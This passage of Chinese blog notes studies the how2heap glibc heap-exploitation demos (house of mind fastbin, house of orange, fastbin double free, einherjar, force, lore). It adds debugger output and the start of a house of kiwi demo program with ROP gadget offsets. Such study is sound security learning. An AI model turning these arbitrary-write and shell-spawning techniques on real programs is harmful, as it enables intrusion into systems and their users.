如果将target-0x10看做chunk头，那么这里正好写入了一个正确的size，即0x60！这也就能够解释为什么源代码一开始要将unsorted bin chunk地址的高位作为size，且需要通过一系列检查了。通过了一系列检查，然后像这样错位写入，就正好能够伪造正确的size！这样，_int_malloc函数就能够为我们返回这个地方的地址了。

对于这个漏洞的利用的理解需要对_int_malloc函数有充分的理解，利用unsorted bin chunk被链入到large bins的过程对堆结构进行攻击。

how2heap 深入学习(2)

发表于 2023-02-28 更新于 2023-03-02 分类于学习笔记， glibc 系列
本文字数： 12k 阅读时长 ≈ 11 分钟

how2heap下载网址: 传送门
Glibc源码查看网址：传送门
参考书籍：CTF竞赛权威指南-pwn篇

测试环境：Ubuntu 16.04
Glibc版本：Ubuntu GLIBC 2.23-0ubuntu11.3

按照顺序，本文分析glibc 2_23文件夹中的第7~8个源码。这两种攻击方式初见比较绕人，也比较难，因此也花了不少时间消化与理解。

7. house_of_mind_fastbin

这是一种较为复杂，不太常见的堆漏洞。原文件中的解释翻译大致如下（英语水平有限，很多地方自己都看不懂…）：

这种攻击与传统的house of mind类似，后者使用一个假的非主线程所占有的arena来向一个新的地址写入。而前者使用的是fastbin作为写入的地址。
如果能够分配任意数量的chunk，且对于chunk的size域有一字节的溢出，我们就可以控制很多东西。
这可以被用来覆写一个已经被free的chunk到一个任意地址，或者可以在任意地址写入一个超大整数值。
chunks的size域中低3 bit存放的是控制信息，由低到高分别为prev_inuse、mmap、non_main arena。使用non_main arena是本攻击的重点。
首先，我们需要知道chunk是怎么知道自己不是主线程的arena。
下面是_heap_info结构体的声明：

struct _heap_info
{
  mstate ar_ptr;           // Arena for this heap. <--- Malloc State pointer
  struct _heap_info *prev; // Previous heap.
  size_t size;            // Current size in bytes.
  size_t mprotect_size;   // Size in bytes that has been mprotected
  char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK]; // Proper alignment
} heap_info;

这里有一个值得注意的点是arena中的malloc_state是通过ar_ptr获取的，这是该结构体的第一个元素。malloc_state == mstate == arena。
main arena有一个特殊的指针。但是，非main arenas在一个堆段的起始处。它们通过下面的代码获取，这里也是用户控制arena_for_chunk中ptr的地方。

#define heap_for_ptr(ptr) \
  ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
  (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)

这个宏获取了ptr然后减去了一个大数，因为heap_info应该在整个堆段的开头。那么通过使用这个，程序就可以找到需要使用的arena。
这个攻击的想法是使用一个假的arena来写一个指针到一个地址，这个地址在free掉fastbin时滥用了arena_for_chunk的功能。

这个攻击做了如下事情：
1. 找到一个可用的arena地址作为non_main arena的地址
2. 分配足够的chunk来到达这个non_main arena的位置，在那个位置我们可以控制arena控制字段的值
3. 创建一个假的_heap_info来指明之后要使用的at_ptr
4. 使用这个假的arena(ar_ptr)，我们使用fastbin，配合一个堆指针向一个ar_ptr不期望写入的地址写入。

进行这个攻击的前提条件：
1. 一个堆区地址的泄露，以知道假的_heap_info在什么地方（需要有可能避免特殊的喷射技术）
2. 无限制分配堆空间的能力
3. 一字节的溢出到下一个chunk的size处（需要能够放入fastbin中，因此如果有tcache需要首先填满tcache）
4. malloc state（ar_ptr）的地址需要是一个大于在malloc_state.system_mem中被free的fastbin大小的值，否则这个chunk会被认为无效（这可以通过排列值完成）
5. 下一个chunk，已经被free，必须有一个有效的size值（大于0x20且小于malloc_state.system_mem）

看完这一大段话我是一脸懵逼的，不知所云。程序中说的是产生一个constrained WRITE-WHERE primitive。算了，叫什么名词无所谓，看他是怎么玩的。

跟着程序单步走，在进入while循环之前栈的结构如下：

00:0000│ rsp 0x7fffffffe450 —▸ 0x7ffff7ffe168 ◂— 0x0
01:0008│     0x7fffffffe458 ◂— 0x1ff0004000000	;MAX_SIZE | HEAP_MAX_SIZE
02:0010│     0x7fffffffe460 ◂— 0x604430 ◂— 0x0	;user_mem
03:0018│     0x7fffffffe468 —▸ 0x603420 ◂— 0x0	;fake_arena	
04:0020│     0x7fffffffe470 —▸ 0x603448 ◂— 0x0	;target_loc
05:0028│     0x7fffffffe478 —▸ 0x603410 ◂— 0x0	;target_chunk
06:0030│     0x7fffffffe480 ◂— 0x4000000		;new_arena_value
07:0038│     0x7fffffffe488 ◂— 0x4000000		;fake_heap_info
08:0040│     0x7fffffffe490 —▸ 0x7fffffffe580 ◂— 0x1
09:0048│     0x7fffffffe498 ◂— 0x0
0a:0050│ rbp 0x7fffffffe4a0 —▸ 0x4008c0 (__libc_csu_init) ◂— push   r15
0b:0058│     0x7fffffffe4a8 —▸ 0x7ffff7a2d840 (__libc_start_main+240) ◂— mov    edi, eax

之后进入循环一直分配大小为MAX_SIZE==0x1FF00大小的chunk直到分配到的chunk的地址大于new_arena_value==0x4000000。然后malloc(0x50)，将上述stack中08:0040处赋值为fastbin chunk的值（测试为0x4028F50）。之后，程序对0x4000000处进行了写操作，这里是要作为假的arena，因此有：

1	fake_heap_info[0] = (uint64_t) fake_arena; // Setting the fake ar_ptr (arena)

将假_heap_info的第一个字段（ar_ptr）设置为假的arena所在处（0x603420）。调试显示，在没有攻击时，被攻击地址（0x603448）处的值为0，然后将那个最后分配的chunk的size中的non_main arena位修改为1。最后，将这个fastbin释放，然后就可以看到目标地址处被写入了fastbin的地址，成功将其修改为一个较大的值。

看到这里，已经大概明白了。实际上就是伪造一个malloc_state结构体在chunk中，然后欺骗free让它将bins链入这个假的arena中。因为malloc_state是arena所有控制字段以及bins的头指针所在的地方，具体定义如下：

struct malloc_state
{
  /* Serialize access.  */
  mutex_t mutex;

  /* Flags (formerly in max_fast).  */
  int flags;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c.  */
  struct malloc_state *next_free;

  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c.  */
  INTERNAL_SIZE_T attached_threads;

  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};

这里需要注意为什么这个fastbin会修改到0x603448的值。查看mutex_t的定义知道这就是int类型，后面的flags也是一个int类型。紧随其后的fastbinsY是按照fastbin的大小链入的，从0x20大小开始。

addr	0x0	0x4	0x8	0xC
0x603420	mutex	flag	fastbinsY[0] (for chunk size=0x20)
0x603430	fastbinsY[1] (for chunk size=0x30)		fastbinsY[2] (for chunk size=0x40)
0x603440	fastbinsY[3] (for chunk size=0x50)		fastbinsY[4] (for chunk size=0x60)
......	......		......

由于释放的chunk大小为0x60，因此它被链入fastbinsY[4]的开头，而fastbinsY[4]的地址正好就是0x603448，这样要攻击的地址的值就被成功修改了。

综上所述，这种攻击的局限性较大，不仅前提条件很多，而且还不能任意修改值，在题目中可能会作为一种辅助的攻击手段来使用。其中最关键的两步就是修改了0x4000000处和fastbin的non_main arena的值。

8. House_of_orange

在how2heap的注释说明中，这个漏洞已经在glibc 2.24被修复。

（摘自参考书籍）
这是一种FSOP（File Stream Oriented Programming），劫持_IO_list_all来伪造链表的利用技术，通过调用_IO_flush_all_lockp函数触发。该函数在以下3种情况触发：libc检测到内存错误从而执行abort流程时、执行exit函数时、main函数返回时。（源码演示的是第一种）

乍一看，这个漏洞的执行流程较为复杂。要理解house_of_orange，首先要明确当需要分配的chunk大小大于top chunk会怎样。

在malloc函数中，当所有的freed chunk均不能满足分配时，会检查top chunk，这通过调用sysmalloc来实现。查看了一下sysmalloc函数，发现里面的判断关系很复杂。按照how2heap源码中的说法，在这里会将被缩小的top chunk释放，前提是top chunk的尾部需要是一页的尾部（即紧跟top chunk后面的地址是0x1000的整数倍）。源码中将top chunk的大小从0x20C01改为0xC01，然后分配大小为0x1000的堆块。但是通过自己写代码测试发现，在堆正常工作时，即使top chunk的大小也是0xC01，下一个分配的堆块也是0x1000大小，所有的chunk还是紧密连接，且没有一个chunk在bin中。

看来这里面的逻辑有更加复杂的一些方面，即使是看源代码也不容易进行分析。最后还是在书中找到了答案。

sysmalloc函数调用时会发生两种情况：第一种调用sbrk函数直接扩充top chunk，第二种调用mmap函数分配一块新的top chunk。为了能够使用前一种扩展chunk，需要请求小于阈值mp_.mmap_threshold。
同时，为了能够调用sysmalloc函数中的_int_free函数，需要top chunk在减去一个防止fencepost的MINSIZE后，还要大于MAXSIZE，即0x20；如果是main_arena，则需要放置两个fencepost。还需要绕过两个assert：满足old_size小于nb+MINSIZE，prev_inuse标志位为1，以及old_top+old_size页对齐。

虽然还是有些懵，但先往下看。

运行how2heap源码，分配0x1000后显示的堆信息如下：

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x602000
Size: 0x401

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x602400
Size: 0xbe1
fd: 0x7ffff7dd1b78
bk: 0x7ffff7dd1b78

Allocated chunk
Addr: 0x602fe0
Size: 0x10

Allocated chunk | PREV_INUSE
Addr: 0x602ff0
Size: 0x11

Allocated chunk
Addr: 0x603000
Size: 0x00

分配0x1000之后，源码注释里面写到下面假设这个unsorted bin能够被写。那也就是说这个地方不一定要通过上面的方法获取unsorted bin，有可能通过其他方式获得的unsorted bin也能进行后续操作，这个示例只是不使用free函数就获得了unsorted bin中的chunk而已。还是先往下看。

1
2
3

这种攻击利用的是中止程序的函数。当程序异常中止时，会将所有文件指针清空，通过调用_IO_flush_all_lockp实现，最终遍历_IO_list_all并调用_IO_OVERFLOW函数。
这种攻击的思路是用一个假的文件指针覆写_IO_list_all指针，它的_IO_OVERFLOW指向的是system函数，且开头8字节被设定为'/bin/sh'。因此调用_IO_OVERFLOW(fp, EOF)就是调用system('/bin/sh')。
_IO_list_all的地址可以通过unsorted bin的fd和bk指针获取（当unsorted bin中仅有一个chunk时，这个chunk的fd和bk指针均指向main_arena + 0x88处【仅限glibc 2.23】）。源代码中_IO_list_all在其之后0x9A8处。

其中操作的文件结构体定义如下：

struct _IO_FILE_plus
{
  _IO_FILE file;
  const struct _IO_jump_t *vtable;
};
extern struct _IO_FILE_plus *IO_list_all;

struct _IO_FILE {
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

  /* The following pointers correspond to the C++ streambuf protocol. */
  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
  char* _IO_read_ptr;	/* Current read pointer */
  char* _IO_read_end;	/* End of get area. */
  char* _IO_read_base;	/* Start of putback+get area. */
  char* _IO_write_base;	/* Start of put area. */
  char* _IO_write_ptr;	/* Current put pointer. */
  char* _IO_write_end;	/* End of put area. */
  char* _IO_buf_base;	/* Start of reserve area. */
  char* _IO_buf_end;	/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;	// 这个是进程FILE的指针域，通过这个指针链接形成链表，表头为_IO_list_all

  int _fileno;
#if 0
  int _blksize;
#else
  int _flags2;
#endif
  _IO_off_t _old_offset; /* This used to be _offset but it's too small.  */

#define __HAVE_COLUMN /* temporary */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  /*  char* _save_gptr;  char* _save_egptr; */

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
#if defined _G_IO_IO_FILE_VERSION && _G_IO_IO_FILE_VERSION == 0x20001
  _IO_off64_t _offset;
# if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
# else
  void *__pad1;
  void *__pad2;
  void *__pad3;
  void *__pad4;
# endif
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
#endif
};

接下来，将chunk的size改为0x61，将chunk的bk指针赋值为_IO_list_all-0x10，对应chunk->bk->fd。

然后将chunk地址看成一个假的_IO_FILE结构体指针fp，但是在最前面写上’/bin/sh\x00’。将fp->_mode设为0（偏移为0xC0）【这里的_mode我看了半天才明白原来不应该忽略#ifdef，如果为假则_IO_FILE中有_mode这个元素】、fp->_IO_write_base设为2、fp->_IO_write_ptr设为3、fp的jump_table处索引为3（偏移为0x78）设为shell函数地址。最后调用malloc出错，打印错误信息后拿到shell。

_int_malloc中通不过的检查：

bck = victim->bk;
          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
              || __builtin_expect (victim->size > av->system_mem, 0))
            malloc_printerr (check_action, "malloc(): memory corruption",
                             chunk2mem (victim), av);

看到这里，虽然整个流程走完了，但还是不禁要问一句，他为什么要这样设定？为什么要改变这些地址？将2016年此方法诞生的那道题——HITCON CTF 2016 House of Orange的解析看完后，便明白了。

要在遍历_IO_list_all时拿到shell，所以应该让这个指针指向我们可以控制的内存区域，也就是这个被释放的老top chunk。那既然要遍历_IO_list_all，为什么源码中没有修改这里的值，让其指向old top chunk？

在源码中并没有直接对_IO_list_all中的值进行修改，它是在最后一次调用malloc函数时libc修改的。可以想想如果我们自己写一个双向链表的脱链操作，要将链表中的第一个元素脱链，就必然要在脱链之后将头指针指向原来链表中的第二个元素。因此最后的malloc(0x10)中，libc检查了老top chunk后会将其从unsorted bin中拿出来，之后old top chunk的bk指针指向的(_IO_list_all-0x10)->fd就会被成功修改，而(_IO_list_all-0x10)->fd == _IO_list_all。所以这里是在最后被修改的。实际上，这是一种unsorted bin attack。整个攻击流程实际上是unsorted bin attack与FSOP的结合。

这里为什么要将unsorted bin的size改为0x61？

注意：malloc函数查找bins的顺序是：fastbins、small bins、unsorted bin、large bins。在搜索unsorted bin时，除分配small bins大小的chunk有时会进行拆分之外，与搜索fastbins相同，返回大小与请求大小正好相等的chunk，其他的chunk会根据大小链入small bins和large bins中。这里将size改为0x61，是为了在malloc时将其链入到smallbins[5]中。在arena的控制结构体中，fastbins的地址在最前面，之后是其他bins的地址，都在一个数组bins中，bins[0]、bins[1]分别为unsorted bin的头指针和尾指针；bins[2]、bins[3]为存放大小为0x20的chunk的small bin的头指针和尾指针…bins[10]、bins[11]就是为存放大小为0x60的chunk的small bin的头指针和尾指针，这也是第5个smallbin。之前_int_malloc函数已经将_IO_list_all修改为top chunk，那么在内存检查失败后会到达top chunk的地方，误认为这是一个_IO_FILE结构体。
这里需要注意_IO_list_all被修改后的值。_IO_list_all是被修改为了unsorted bin头指针，即bins[0]的地址main_arena + 0x58，而不是top chunk的地址。因此，libc实际上会将main_arena + 0x58作为一个_IO_list_all结构体的头部。
那么要想让libc遍历到top chunk里面去，还要在后面再链接一个指针指向top chunk。在_IO_FILE结构体中0x68偏移指向的是_IO_FILE* chain，即下一个元素的指针。遍历到一个_IO_FILE_plus时，会执行vtable中的函数。下面是vtable的结构体定义。

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
    get_column;
    set_column;
#endif
};

要执行的函数是第4个，因此源码中修改索引为3的值为后门函数。vtable紧跟在_IO_FILE结构体后面，因此也是可以控制的地址。

为什么要设置_mode=0，fp->_IO_write_base=2、fp->_IO_write_ptr=3？

执行_IO_OVERFLOW函数的是_IO_flush_all_lockp函数，其中调用_IO_OVERFLOW的语句如下：

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
#endif
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)
	result = EOF;

由此可知需要绕过一个检查，即(fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)，这也就不难理解了。只有绕过它才能执行_IO_OVERFLOW函数。

总结一下，整个攻击流程大致有这么几步：

不使用free函数获得一个unsorted bin中的chunk，同时泄露libc的基地址
构造chunk的结构准备攻击，包括绕过检查、设置system地址到指定地址
用malloc函数触发攻击

到这里，House of orange的神秘面纱算是彻底揭开了。能够真正理解这个攻击，我们的水平就又提升了一个档次。

how2heap 深入学习(1)

发表于 2023-02-28 更新于 2023-03-02 分类于学习笔记， glibc 系列
本文字数： 5.2k 阅读时长 ≈ 5 分钟

刚刚接触pwn的时候就听说过how2heap的大名，奈何那时懒得搭环境无法真实测试。现在环境已经基本完成搭建，于是对how2heap中的内容进行深入学习并记录笔记，温故而知新。本文是基于对how2heap教学项目中源码的分析与理解而完成的学习笔记。

how2heap下载网址: 传送门
Glibc源码查看网址：传送门
参考书籍：CTF竞赛权威指南-pwn篇

测试环境：Ubuntu 16.04
Glibc版本：Ubuntu GLIBC 2.23-0ubuntu11.3

按照顺序，本文分析glibc 2_23文件夹中的第1~6个源码。

1. fastbin_dup

本程序演示fastbin的double_free漏洞。只需要在两次free中间再进行其他free操作，就可以在fastbin链表中存放两个相同的chunk。这个不难理解。

2. fastbin_dup_consolidate

本程序演示另一种double_free漏洞。在glibc 2.23中，如果fastbin中有chunk存在，那么之后申请一块大于fastbin范围的chunk，会将fastbin中的chunk转移到small bins中。原因如下：

首先fastbin中的chunk会通过malloc_consolidate函数转移到unsorted bins中，之后malloc函数在unsorted bins中查找符合大小的chunk。这时就发现了刚刚被转移过来的小chunk。发现大小不够之后，这些chunk又会被转移到small bins中。（malloc在遍历unsorted bin时会将大小不符合的chunk转移到small bins/large bins中）

此时，fastbin为空，可以将原先在fastbin中的chunk再次free，形成double_free漏洞。

注意：在Glibc 2.23中，malloc只会检查fastbin中是否进行了连续的两次free，而不会将fastbin和其他bins中的chunk整合进行检查。

此时，在fastbins和small bins中就存在两个相同的chunk。

3. fastbin_dup_into_stack

本程序演示double_free漏洞的一种应用，即利用fastbin_dup中的double_free漏洞将堆挟持到栈区，在栈区创建chunk。
首先进行double_free。此时fastbin中的结构为：

fastbin → a → b → a

此时将a分配出来，即可对a的fd指针进行任意写。

注意：fastbin是一个链栈结构，遵循后进先出的规则。因此将a分配出来后fastbin的结构为：

fastbin → b → a

现在，将a中的fd指针更改为栈区某处（这里实际上可以改为任何可写的区域，如bss段等）。将b分配出去，再次分配a后，fastbin中就会有我们自定义的那个地址。

fastbin → <any address we want> → <other things>

再分配相同大小的chunk，就可以将chunk分配到任何可写的地方。

4. house_of_einherjar

本程序演示house of einherjar漏洞。这是一种null off by one漏洞，即仅溢出一个’\x00’字节即可实现任意地址写。原理如下：

首先，需要明确的是，在glibc 2.23 64bit中，如果malloc的大小为0x8 + n*0x10，那么该chunk能够控制下一个chunk的previous size值。因为chunk在64bit中按照0x10对齐（32bit中以0x8对齐），所有chunk的起始地址最低4bit均为0。因此对于分配0x8 + n*0x10的情况，glibc做出的处理是：将后一个chunk的previous size域作为前一个chunk的可用空间。正常情况下，当前一个chunk正在使用时，后一个chunk的previous size不起作用。

在上述的前提条件下，可以任意指定previous size的值，并通过溢出一个’\x00’字节对后面一个chunk的size进行部分修改。

如果后面一个chunk的size域最低一字节原来为0x01（1表示prev_in_use标志位，即前面一个chunk正在使用中），溢出后变为0x00。假设后一个chunk的地址为x，需要写的地址为y。那么应将后一个chunk的prev_size改为x-y。这样在free后面一个chunk时，malloc_consolidate函数会进行chunk的合并，将chunk头的地址当做y。

注意：这里不会进行整型溢出的检查，因此x<y也是可行的，此时x-y是一个很大的数。

如果后面一个chunk的size域最低一字节原来不是0x01而是0x?1，那么溢出一个空字符后，chunk的size会被改变。如果此时不加任何其他处理，在chunk与top chunk合并时会出错。原理：

_int_free函数中判断后一个chunk是通过size偏移确定的，如果size被改变且没有在后面伪造chunk，在_int_free函数中有一项检查是后一个chunk的prev_in_use是否为1。很显然正常情况下这里都是1，因为没有free之前前一个chunk正在使用，因此如果此时后一个chunk的prev_in_use位为0说明堆结构被篡改。

重要：_int_free中的检查项目（部分）

检查相邻chunk是否相等，是则为double free

if(__builtin_expect (old == p, 0))
{
	errstr = "double free or corruption (fasttop)";
    goto errout;
}

检查该chunk是否为top chunk，top chunk不可被free

if (__glibc_unlikely (p == av->top))
   {
	errstr = "double free or corruption (top)";
	goto errout;
   }

检查该chunk是否超过了arena的范围

if (__builtin_expect (contiguous (av)
	  && (char *) nextchunk
	  \>= ((char *) av->top + chunksize(av->top)), 0))
   {
	errstr = "double free or corruption (out)";
	goto errout;
   }

检查紧跟该chunk后面（高地址处）的prev_in_use位是否为1

if (__glibc_unlikely (!prev_inuse(nextchunk)))
   {
	errstr = "double free or corruption (!prev)";
	goto errout;
   }

检查紧跟该chunk后面的size是否合理（不能过小或过大）

nextsize = chunksize(nextchunk);
   if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (nextsize >= av->system_mem, 0))
     {
errstr = "free(): invalid next size (normal)";
goto errout;
     }

笔记：free调用时会调用malloc_consolidate函数整理fastbins。对于fastbins中的chunk先向低地址合并再向高地址合并。这一步操作在最后完成

因此后面一个chunk的size域最低一字节原来不是0x01而是0x?1时，需要在对应的位置伪造一个chunk，将损失的size大小补齐，来绕过检查。后面的效果与第一种情况相同。

5. house_of_force

本程序演示house_of_force漏洞。这个漏洞的思路比较简单，利用了top chunk。

在glibc 2.23中，malloc不会对top chunk的size进行检查，因此如果能够将top chunk的size修改为很大，就可以malloc任意大小的chunk，从而在任意地址写。

注意：malloc不检查整型溢出。如果需要写的地址在top chunk的低地址处，也可以通过整型溢出到达。

假设top chunk头的地址为x，要写的地址为y。那么首先malloc大小为x-y大小的堆块，然后再malloc一下即可对该地址写。注意前面的prev_size和size，必要时需要分配x-y-0x10（32bit为x-y-0x8）大小堆块以实现对目标地址的完全控制。

6. house_of_lore

本程序演示house_of_lore漏洞，这是一种利用small_bins的攻击方式。

small bins/large bins/unsorted bins的双向链表结构如下图所示

同unsorted bin类似，small bin也类似于链栈结构，但是双向链表。将small bins中位于链尾的chunk的bk指针修改为想要写的地址，在small bin中的chunk被分配完之后，再次分配就能在该地址创建chunk。

但是在目标地址处还需要进行一些预处理工作。由于glibc的检查机制，导致直接挟持堆不可行。

下面是_int_malloc函数中查找small bins片段的代码：

if (in_smallbin_range (nb))
   {
     idx = smallbin_index (nb);
     bin = bin_at (av, idx);

     if ((victim = last (bin)) != bin)
     {
       if (victim == 0) /* initialization check */
         malloc_consolidate (av);
       else
       {
         bck = victim->bk;
	  if (__glibc_unlikely (bck->fd != victim))
         {
           errstr = "malloc(): smallbin double linked list corrupted";
           goto errout;
         }
         set_inuse_bit_at_offset (victim, nb);
         bin->bk = bck;
         bck->fd = bin;

         if (av != &main_arena)
           victim->size |= NON_MAIN_ARENA;
         check_malloced_chunk (av, victim, nb);
         void *p = chunk2mem (victim);
         alloc_perturb (p, bytes);
         return p;
       }
     }
   }

其中有一个明显的检查是__glibc_unlikely (bck->fd != victim)，它检查要分配的chunk的bk指向的chunk中的fd指针是否是这个chunk。由于我们要分配的是一个假的chunk，因此需要提前设置好这个假chunk的bk指针，以及bk指针指向的另外一处假chunk中fd指针的值，保证二者正确。为了保证结果正确，如果在假chunk之前分配的chunk地址已知，可以将这个地址写入假chunk的fd指针中以使得双向链表完整。当然就上述代码来看这里不设置应该也是可以的。

注意：这里的检查并未涉及prev_size和size，因此这二者的值对于假chunk的分配没有影响。原演示文件中将这两个值均设为0。

因此总结一下，如果需要写入的地址为x，那么需要将small bins中最后一个chunk的bk指针改为x-0x20（如果写入垃圾数据无妨，可以将这个地址再适当下压一些，如x-0x30，这就需要写入0x10字节的垃圾数据），并且需要在x-0x8处（对应bk）写入另一个地址y，在y+0x10处（对应fd）需要写入x-0x20。故实现该漏洞不仅需要能够在可写地址的低地址方向某处一个8字节区域可写，并且需要另一处8字节区域可写。（需要的两处可写的地方即为下表中标红的地方）

addr	+0x0	+0x8
x-0x20	prev_size	size
x-0x10	DEADBEEF	addr_y
…	…	…
y	prev_size	size
y+0x10	addr_x-0x20	DEADBEEF

glibc 2.35 pwn——house of kiwi示例程序

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， glibc 系列
本文字数： 17k 阅读时长 ≈ 16 分钟

这是笔者写的house of kiwi示例程序，需要在ubuntu 22.04上编译运行。本程序改编自https://www.anquanke.com/post/id/235598的demo程序，其中说明了house of kiwi的利用流程。house of kiwi的利用与house of emma类似，利用链更短，也更好理解一些。

若程序在运行过程中出现任何非预期情况，请及时与笔者联系，以便及时进行修改。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#define pop_rdi_ret libc_base + 0x000000000002a3e5
#define pop_rdx_r12 libc_base + 0x000000000011f497
#define pop_rsi_ret libc_base + 0x000000000002be51
#define pop_rax_ret libc_base + 0x0000000000045eb0
#define syscall_ret libc_base + 0x0000000000091396
#define ret pop_rdi_ret+1
size_t libc_base;
size_t ROP[0x30];
char FLAG[0x100] = "./flag\x00";

int main() {
    setvbuf(stdin,0LL,2,0LL);
    setvbuf(stdout,0LL,2,0LL);
    puts("\033[32mHello there! Today let's learn something about house of kiwi.\033[0m");
    puts("\033[32m本程序演示house of kiwi的利用流程。\033[0m");
    puts("\033[1;32mModified from demo in https://www.anquanke.com/post/id/235598.\033[0m");
    puts("\033[1;32m改编自https://www.anquanke.com/post/id/235598的demo程序。\033[0m");
    puts("\033[1;31mTested in Ubuntu 22.04, glibc version: Ubuntu GLIBC 2.35-0ubuntu3.1\033[0m");
    puts("\033[1;31m测试环境：Ubuntu 22.04，glibc版本为2.35-0ubuntu3.1\033[0m");
    
    puts("\033[32mFirst let's make clear how to exploit.\033[0m");
    puts("\033[32m首先让我们搞清楚这种利用方式是如何工作的。\033[0m");
    puts("\033[32mSame as house of emma, house of kiwi has a stable call chain.\033[0m");
    puts("\033[32m与house of emma相同，house of kiwi有一条稳定的函数调用链。\033[0m");
    puts("\033[32mIt started with function sysmalloc, which can be triggered when we need top chunk.\033[0m");
    puts("\033[32m这条调用链开始于sysmalloc函数，可以通过向top chunk分配chunk来触发该函数。\033[0m");
    
    puts("\033[32mIn function sysmalloc, there is a check for page alignment of top chunk: \n\033[0m");
    puts("\033[32m在函数sysmalloc中，有一个检查top chunk页对齐的代码片段: \033[0m");
    puts("\033[33m(line 2617, /malloc/malloc.c)\033[0m");
    puts("\033[34m  assert ((old_top == initial_top (av) && old_size == 0) ||\n"
         "          ((unsigned long) (old_size) >= MINSIZE &&\n"
         "           prev_inuse (old_top) &&\n"
         "           ((unsigned long) old_end & (pagesize - 1)) == 0));\n\033[0m");
    puts("\033[32mThe function assert here in malloc.c is a bit different from that in other file.\033[0m");
    puts("\033[32m这个malloc.c中的assert函数与其他文件中的函数不太一样。\033[0m");
    puts("\033[32mBecause in malloc.c there is a #define statement: \033[0m");
    puts("\033[32m因为在malloc.c中有一个#define语句: \n\033[0m");
    puts("\033[33m(line 292, /malloc/malloc.c)\033[0m");
    puts("\033[34m# define __assert_fail(assertion, file, line, function)\t\t\t\\\n"
         "\t __malloc_assert(assertion, file, line, function)\n\033[0m");
    puts("\033[32mSo that if the assertion in malloc.c failed, it will call function __malloc_assert.\033[0m");
    puts("\033[32m所以如果这个检查失败了，那么它就会调用__malloc_assert.\033[0m");

    puts("\033[32mThe content of function __malloc_assert is: \033[0m");
    puts("\033[32m__malloc_assert函数的内容为: \033[0m");
    puts("\033[33m(line 297, /malloc/malloc.c)\033[0m");
    puts("\033[34mstatic void\n"
         "__malloc_assert (const char *assertion, const char *file, unsigned int line,\n"
         "\t\t const char *function)\n"
         "{\n"
         "  (void) __fxprintf (NULL, \"%s%s%s:%u: %s%sAssertion `%s' failed.\\n\",\n"
         "\t\t     __progname, __progname[0] ? \": \" : \"\",\n"
         "\t\t     file, line,\n"
         "\t\t     function ? function : \"\", function ? \": \" : \"\",\n"
         "\t\t     assertion);\n"
         "  fflush (stderr);\n"
         "  abort ();\n"
         "}\033[0m\n");
         
    puts("\033[32mWhile in function fflush, it will jump to a function, and that is our chance.\033[0m");
